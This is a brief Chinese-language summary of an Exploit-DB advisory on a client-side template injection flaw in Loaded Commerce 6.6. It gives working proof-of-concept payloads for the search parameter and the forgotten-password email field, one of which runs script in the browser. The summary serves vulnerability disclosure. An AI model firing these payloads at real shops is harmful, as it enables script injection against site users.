### 漏洞关键信息 #### 漏洞概述 - **EDB-ID:** 52084 - **CVE:** N/A - **作者:** tmrswrr - **类型:** WEBAPPS - **平台:** PHP - **日期:** 2025-03-19 - **易受攻击的应用程序:** Loaded Commerce 6.6 #### 漏洞详情 - **漏洞类型:** Client-Side Template Injection (CSTI) - **版本:** 6.6 - **测试环境:** https://www.softaculous.com/apps/ecommerce/Loaded_Commerce - **注入点:** - **搜索参数注入:** ``` https://demos1.softaculous.com/Loaded_Commerce/index.php?rt=core%2Fadvanced_search_result&keywords={{7*7}} ``` 返回结果为49,确认存在模板注入漏洞。 - **忘记密码页面注入:** ``` https://demos1.softaculous.com/Loaded_Commerce/index.php?rt=core/password_forgotten&action=process ``` 在电子邮件字段中提交`{{constructor.constructor('alert(1)')()}}`会触发一个弹窗,表明存在客户端代码执行漏洞。 #### 附加信息 - **Vendor Homepage:** https://loadedcommerce.com/ - **标签:** 无 - **建议/来源:** [Link](#) 上述信息提供了关于Loaded Commerce 6.6的Client-Side Template Injection(CSTI)漏洞的基本描述和利用方法。